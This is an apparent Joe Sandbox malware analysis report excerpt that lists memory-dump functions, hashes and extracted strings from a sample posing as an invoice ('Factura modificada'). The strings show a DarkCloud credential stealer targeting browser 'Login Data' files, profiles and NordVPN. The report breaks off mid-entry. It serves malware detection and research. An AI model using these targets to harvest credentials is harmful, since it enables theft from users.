                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction ID: 04caf9f361426b13dcd559d8003ca74e8cc1eb34f683fbfc2f3e476523c91da1
                                                                                          • Opcode Fuzzy Hash: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction Fuzzy Hash: DEE0E5B4E04208EFCB44DFA8D941AADFBF4EB49310F14C0AA9D09A3360D771AA51DF80
                                                                                          Function 07756020 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction ID: 34087002cfb086463f4522a8ef2af61fc4055e5d403192f1c7cbdd67cbf4a1d5
                                                                                          • Opcode Fuzzy Hash: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction Fuzzy Hash: 4AE0C2B4E08208EFCB94DFA8D940AACBBF4EB49310F50C0AA9C18E3351D6759A51DF80
                                                                                          Function 0775A890 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction ID: 2ce0f7ea19f9e8104372f703d36404f48b165c095c270ec199b46f3f5ca511f7
                                                                                          • Opcode Fuzzy Hash: 23a1750582a5c4c640aefcf785df2ecc10e7786c034820e34712d9b849f48d9a
                                                                                          • Instruction Fuzzy Hash: 2FE0A5B4D04208AFCB44DFA8D54069CBBF4AB49310F10C1AA9C18A3350D671AE52DB40
                                                                                          Function 07745A9C Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 10743ec94f085162df1a6cd6d6755f9a6157270549d48c71051343f5c23ffda2
                                                                                          • Instruction ID: 31542031d07c73489cc66cad547c8f8539bd0c571c0cd88d0be3639652dd82bb
                                                                                          • Opcode Fuzzy Hash: 10743ec94f085162df1a6cd6d6755f9a6157270549d48c71051343f5c23ffda2
                                                                                          • Instruction Fuzzy Hash: 31F0BD716041298BC754EF28C888A5AB7F1FB4D300F1154E5A61EA7348D7359E84DF51
                                                                                          Function 0775A520 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a22b411638ebeeed530c65a4d6e7ebb227e0cb110e2689718ab3cc4eb011f961
                                                                                          • Instruction ID: 423511af1f0f0bdda3f55171593b1198077aef9cd037f24c2bda1014a250615a
                                                                                          • Opcode Fuzzy Hash: a22b411638ebeeed530c65a4d6e7ebb227e0cb110e2689718ab3cc4eb011f961
                                                                                          • Instruction Fuzzy Hash: 59E0E5B4E04208EFCB84DFA8D540AACBBF4EB89300F10C1AA9819A3350D6719E05CF40
                                                                                          Function 0775A678 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a22b411638ebeeed530c65a4d6e7ebb227e0cb110e2689718ab3cc4eb011f961
                                                                                          • Instruction ID: 31ebb451d495e813a2be1a4d157939602eefd814224e8b18c52a8d15a02c05fb
                                                                                          • Opcode Fuzzy Hash: a22b411638ebeeed530c65a4d6e7ebb227e0cb110e2689718ab3cc4eb011f961
                                                                                          • Instruction Fuzzy Hash: 01E0E5B4E04208EFCB44DFA8D540AACBBF4EB89204F10C6EA8808A3350D6719A02CF41
                                                                                          Function 0775F0B8 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 34c31ad56b66c541ec3ea9aeb9a6e60b49c0a567842c2fe1a2c88a908dcf4918
                                                                                          • Instruction ID: 7a9fca87201696d544d89b069954fccddc2ff6781ffe98b8b9451c16dd59797b
                                                                                          • Opcode Fuzzy Hash: 34c31ad56b66c541ec3ea9aeb9a6e60b49c0a567842c2fe1a2c88a908dcf4918
                                                                                          • Instruction Fuzzy Hash: F1E04FB095920DEFC744EFB8D5453AD7BF49B09201F1084A9DA0DA3350D6745A44C742
                                                                                          Function 0775F680 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a22b411638ebeeed530c65a4d6e7ebb227e0cb110e2689718ab3cc4eb011f961
                                                                                          • Instruction ID: db6695503741ccc8552fbf94e49316091e68ad69df5c9a4e9fab320b0c59917c
                                                                                          • Opcode Fuzzy Hash: a22b411638ebeeed530c65a4d6e7ebb227e0cb110e2689718ab3cc4eb011f961
                                                                                          • Instruction Fuzzy Hash: 30E0E5B4E05208EFCB84DFA9D5406ACBBF4EB89304F1081AAC818A3350DA719A41CF40
                                                                                          Function 012618F0 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a413fa5e9e7fa044bd84fe5a39019b8869d3512fff484273e8f8e90b1caa93d2
                                                                                          • Instruction ID: 2bf5bf668b0394af8089a3162fe4299c4ce68c29a48f6f65666c956886b5c875
                                                                                          • Opcode Fuzzy Hash: a413fa5e9e7fa044bd84fe5a39019b8869d3512fff484273e8f8e90b1caa93d2
                                                                                          • Instruction Fuzzy Hash: 25E08630315304CFE7286B7AA41A36D329BE7C5342F288479C11E433D5DE36A895DB00
                                                                                          Function 0126FAA0 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e8cdc3e158e25bac31dd93cd3647c65e5fa804d31232a7f7228cda51ae87997
                                                                                          • Instruction ID: 1a894bb17aa510c8cdcab8df7149c9b4b8bb03ebc227bba30534b3a14605fd67
                                                                                          • Opcode Fuzzy Hash: 0e8cdc3e158e25bac31dd93cd3647c65e5fa804d31232a7f7228cda51ae87997
                                                                                          • Instruction Fuzzy Hash: AEE08675908208EFCB04DF98E9519ADBFBDAB45310F108099DD4857391C7319E81DB94
                                                                                          Function 07758CE0 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8b62d3fa192e85cafc926ff3c26f4304afb9c6d9408f6151bf9756a56129a66d
                                                                                          • Instruction ID: 54e4d66a91b0e508f0d9f7adde5741434f1eec3c69037308f85c5112cc9c79e7
                                                                                          • Opcode Fuzzy Hash: 8b62d3fa192e85cafc926ff3c26f4304afb9c6d9408f6151bf9756a56129a66d
                                                                                          • Instruction Fuzzy Hash: B7E046B4D09308EFCB04DFA8D5506ACFBB8EB89204F1080EACC19A3391C6719E42DB85
                                                                                          Function 0126F298 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 406821c53cf80945bbc1608b731366921e8da0694a2d29103f6269f5d8906f4d
                                                                                          • Instruction ID: ccfc2648aa1e2123379a798f83d49da2f4f9482aeb8a7ed9cda2115efe6fbde5
                                                                                          • Opcode Fuzzy Hash: 406821c53cf80945bbc1608b731366921e8da0694a2d29103f6269f5d8906f4d
                                                                                          • Instruction Fuzzy Hash: 1FE0C271801308EFDB50EFB4D91468EBBFCDB46211F1044E5860993160EB314E04DBD6
                                                                                          Function 0775E470 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9b1204376f16f3aeafb740f5f63fef82a6bc97f540ee60fb5976b40a178a14cd
                                                                                          • Instruction ID: 4e9fb008cb7b8cac604206274a7cb7d498ca19c50fcc80b2f68ecdd494608e7f
                                                                                          • Opcode Fuzzy Hash: 9b1204376f16f3aeafb740f5f63fef82a6bc97f540ee60fb5976b40a178a14cd
                                                                                          • Instruction Fuzzy Hash: E6E012B490D208EBD704DFA4E9416ACBBB9EB46314F108199DC0967351C7B15E46DB85
                                                                                          Function 0775B840 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cbceaccc67965e09d68d49bb469f7a6c1e3dc420aa790699d18f2254e90c795a
                                                                                          • Instruction ID: 9fa03f09e2835a3fd5f609f12a77ae6d56220ce12a0e9d08fbf5239e1c6c3ad7
                                                                                          • Opcode Fuzzy Hash: cbceaccc67965e09d68d49bb469f7a6c1e3dc420aa790699d18f2254e90c795a
                                                                                          • Instruction Fuzzy Hash: 7EE012B281120CBFD780EFB5991069E77EC9B45110F1054A9C50993160EE715F1497D5
                                                                                          Function 01261447 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 47dd908bebd4f2ced59e1929e53e87a7418df92d2e56b5518f700a94718130bc
                                                                                          • Instruction ID: ea15e0ba03199f1060f81e83b9afc0ef0fd8285306317fb80d9ddb5278c4861c
                                                                                          • Opcode Fuzzy Hash: 47dd908bebd4f2ced59e1929e53e87a7418df92d2e56b5518f700a94718130bc
                                                                                          • Instruction Fuzzy Hash: C6D0A734919030CFE712AF22E80536C7338EF81341F545820D58D7B2C5CB64BD4E4B86
                                                                                          Function 0775E848 Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2d6c3d5d8d8d3931f75391324c500de9ad1b168413f91650930e252253d032bf
                                                                                          • Instruction ID: 2aaa4483f2bc257fd467c6b051af8bc73f20e82a45630780ed6f88676bde69e0
                                                                                          • Opcode Fuzzy Hash: 2d6c3d5d8d8d3931f75391324c500de9ad1b168413f91650930e252253d032bf
                                                                                          • Instruction Fuzzy Hash: 92C02BF004F78AA7D1101354680C37972EC830B301F443C368A1D010708FF02400CB08
                                                                                          Function 0126F080 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f252e0e9eb20363dcbc792c2dd4195b7489ded45b9e37453d2f9cac37d9a715f
                                                                                          • Instruction ID: b710fe7233d6ba7fcd6dd1f31429d601f24865a02fc1fffce1c3885c8fbd130d
                                                                                          • Opcode Fuzzy Hash: f252e0e9eb20363dcbc792c2dd4195b7489ded45b9e37453d2f9cac37d9a715f
                                                                                          • Instruction Fuzzy Hash: 43C08C700207068BE3607BAABD1C36DB7AC6B11212F401010D70E524A95BB08880C76A
                                                                                          Function 01260882 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac682388eeb2b971b3559154ca716fa7e2c4c1596f33fd6cd75a02b774d53837
                                                                                          • Instruction ID: 580b0a0aea3bec0bfd1b1bff7d8407877eff5d6c5acd17d44a6a99db6589e48a
                                                                                          • Opcode Fuzzy Hash: ac682388eeb2b971b3559154ca716fa7e2c4c1596f33fd6cd75a02b774d53837
                                                                                          • Instruction Fuzzy Hash: F8C08C3500E3C05FCB0343341C200A83F308F1700032C04CBF0C9C61A3D0039829D712
                                                                                          Function 012642B2 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42670c9fb8e45f47cb3e2d24c17e16a07f74d205883db3c7240b7a7f8add9ad1
                                                                                          • Instruction ID: 82878717a0a677e2329f214242cd0db92ed303d942f6e0a93cb2ed9c360c5dbd
                                                                                          • Opcode Fuzzy Hash: 42670c9fb8e45f47cb3e2d24c17e16a07f74d205883db3c7240b7a7f8add9ad1
                                                                                          • Instruction Fuzzy Hash: 18B0921000E3A11FCB02277088657823F249B43750F9902C2D084CA0A3C0084A1D8376
                                                                                          Function 01262A2D Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c16475d8501dc47287ce4d13ff51b0b69c1c36061594471a4930482f42ce42f5
                                                                                          • Instruction ID: a8db3e968b20053f0309a867d0c3fc72b4727b2d28689215bf5d6eb663f9cc3a
                                                                                          • Opcode Fuzzy Hash: c16475d8501dc47287ce4d13ff51b0b69c1c36061594471a4930482f42ce42f5
                                                                                          • Instruction Fuzzy Hash: 04C092A0E24384DEE7A29F7984407A93DAD8B89300F149A66800AD62D1E8248E858332
                                                                                          Function 01260890 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87620f1a1167499509a71395792b3c985fc7e7fc738c60bd0ec9b64dd6440e3f
                                                                                          • Instruction ID: 8dd6b8ea9a872f4682c27568260b55b5874715181c324c28fc4c4de3c18ef29d
                                                                                          • Opcode Fuzzy Hash: 87620f1a1167499509a71395792b3c985fc7e7fc738c60bd0ec9b64dd6440e3f
                                                                                          • Instruction Fuzzy Hash: 3590023104860C8F464027967C09565775CAA856157940051E55D516515A55A4144695

                                                                                          Non-executed Functions

                                                                                          Function 0126B421 Relevance: .2, Instructions: 170COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 365bb2d7e734c2c242091644b76fc9b3e9e021f0cd95573c57ae9e534ee24dd5
                                                                                          • Instruction ID: 9c53e6766ab31ee6c93d132fed89dc21f7471d156e2049b8dfa31ef6c8ff2157
                                                                                          • Opcode Fuzzy Hash: 365bb2d7e734c2c242091644b76fc9b3e9e021f0cd95573c57ae9e534ee24dd5
                                                                                          • Instruction Fuzzy Hash: C37120B0E116198FD758EF7FE88169A7FF3BF88300F14C129D1099B269EB3159069B51
                                                                                          Function 0126B430 Relevance: .2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 08164380f77cbd7e0252a44768be1fed4e47e579f60b53359c3130b306fc62f7
                                                                                          • Instruction ID: 618222f9d0726ae5e730fa95549e4f7de0e454bbe145f2ff7866e47e5e46d1d6
                                                                                          • Opcode Fuzzy Hash: 08164380f77cbd7e0252a44768be1fed4e47e579f60b53359c3130b306fc62f7
                                                                                          • Instruction Fuzzy Hash: F5712FB4E106198FD758EF7FE88169ABBF3BFC8300F14C129D1099B269EB7059069B51
                                                                                          Function 07740040 Relevance: .1, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eef4dd664beb42f9d73cdbfcbc2f1881c2ba840e192bc1f4fb0c56c7f4e9c84f
                                                                                          • Instruction ID: f20e4c74c4b34b92dbd54ed61d3ada65b1bbc805be55f16f06b2c60949b73abf
                                                                                          • Opcode Fuzzy Hash: eef4dd664beb42f9d73cdbfcbc2f1881c2ba840e192bc1f4fb0c56c7f4e9c84f
                                                                                          • Instruction Fuzzy Hash: 5F51C6B1E05229CBDB78DF2AC848799B6F2BB89344F10C5EAD51DA7254EB740E85CF01
                                                                                          Function 0126BA50 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a83c9b92321554fda3a781c963ac3ccab8c005bb201e3362d1c4141c5e170f44
                                                                                          • Instruction ID: 30e6fca2c968e8ce235844ade7299220a739526183eaa64bcf6297fd45b70cbc
                                                                                          • Opcode Fuzzy Hash: a83c9b92321554fda3a781c963ac3ccab8c005bb201e3362d1c4141c5e170f44
                                                                                          • Instruction Fuzzy Hash: BB318DB1D056188BEB68CF6BCD58789FAF6BFC8304F14C1E9C50CA6254DB7509858F11
                                                                                          Function 0126BA40 Relevance: .1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 74afbaaaa14550a11e497b52b44069592262455a6d44aa58f88103c515a56f86
                                                                                          • Instruction ID: e80deafafeccdc2872113104cbb9713a8db5f3cebaae4faddbb4509ae62b1f64
                                                                                          • Opcode Fuzzy Hash: 74afbaaaa14550a11e497b52b44069592262455a6d44aa58f88103c515a56f86
                                                                                          • Instruction Fuzzy Hash: 3931AAB1D056188BEB28CF6BCD5878AFAF7AFC8300F14C1A9C50CA6265EB7509858F50
                                                                                          Function 0774003A Relevance: .1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1406345482.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_7740000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c5fd8ed7d4ece538a336fa74eb3968cc88d7b93e8eb0f3c16eded0bb9928de2b
                                                                                          • Instruction ID: 36c2d34e8878837b0214cad25bd6af995985df9d3b1da56ea29da8a387d18ec6
                                                                                          • Opcode Fuzzy Hash: c5fd8ed7d4ece538a336fa74eb3968cc88d7b93e8eb0f3c16eded0bb9928de2b
                                                                                          • Instruction Fuzzy Hash: F1217BB1D056198BEB28CF2B8D54799FAF7AFC5340F04C1FA951CA6265DB700A85CF11

                                                                                          Executed Functions

                                                                                          Function 0040CE90 Relevance: 80.0, Strings: 61, Instructions: 3728COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 00171C011F05212D2816$0B18172F037C0E291D211F2A$0C3C2F2807050B2118083C252A016C1734010B$0F3D291D3124323A0C270334$121C081C372C2C35$121E2B160B$1B380907003412$2332141B39000B1A0A003E776C5637240001040520$241D11071323180A0116151E27$2420152E052C4700143D02$32341706203F0701363815$340303341B393E26587051$370F1D010010173A$3C2C3F23341A02$3C3A2B21010D1923$3E04272327173B044C4E43$455A170A013624283437061E091912594001260C3C1B0A3E02552579310435050F$7E5F3D0A2138201D2D1E100B120335544227183E3C043F231469327A3A281F3F20$8C$8C$===============DARKCLOUD===============$@C$@C$@C$@C$@C$BkwBQIvValtcFDrEdmqYpIU$DC$DC$DC$DC$DC$DC$DC$DC$DC$DC$GLrdMdpwhBfNqXmpWHUAnaRJYyXbZCMWLo$H$NordVPN$PQpNoULIsJEPesnPiewyMOs$PStndzkREGbZDHAoJBwVKZCswPswOoJxhlVHfYYUqH$Profiles$TWmdJqRmFsGvMolRhuWHi$TbBdwPcjncoPWVvyKreRUn$ViinsOLTfompVHewTXTgZy$\Profiles$\User Data$\User Data\Default\Login Data$bPxJNfpgUDDSBCoLSUujtOITbVnuNap$bgohwgLOkmzpjTjKQNwEBM$bzjnrawrIDDWvePZiqcHjHlbBmLMgFsf$dTwGsxIkYGpeiNcMSgRUc$fXWfliQaZGCaOkcQJQHdel$hwIFgUncmyTpxgopaYIRK$kQFrbEQshWTfquKhWJRgdp$pjudouBMFSlFphtwdgTUiNukSgrxVGeY$sQsfhVOXFLjFpaywQDJCQdaj$uxlzIlBgDuIcbBdRZctpuCdZqZjzCzBpf$xdbpGlVLBxJqlTaUfOdNKOceZjdxULgE$
                                                                                          • API String ID: 0-460695881
                                                                                          • Opcode ID: bc1b59ffe29463ebb7783152cc5a2d25de0116ed69e812466084656158296b19
                                                                                          • Instruction ID: aeba0e2c3e2b64e149147e6b4e7397141eb77ce18d896fdd0ead1a8aabe61a3b
                                                                                          • Opcode Fuzzy Hash: bc1b59ffe29463ebb7783152cc5a2d25de0116ed69e812466084656158296b19
                                                                                          • Instruction Fuzzy Hash: 5E831B75901228DFDB14DFA4DD84BDAB7B5FB48300F1081EAE50AB72A0DB745A89CF58
                                                                                          Function 0040D86E Relevance: 47.1, Strings: 36, Instructions: 2106COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_401000_InstallUtil.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
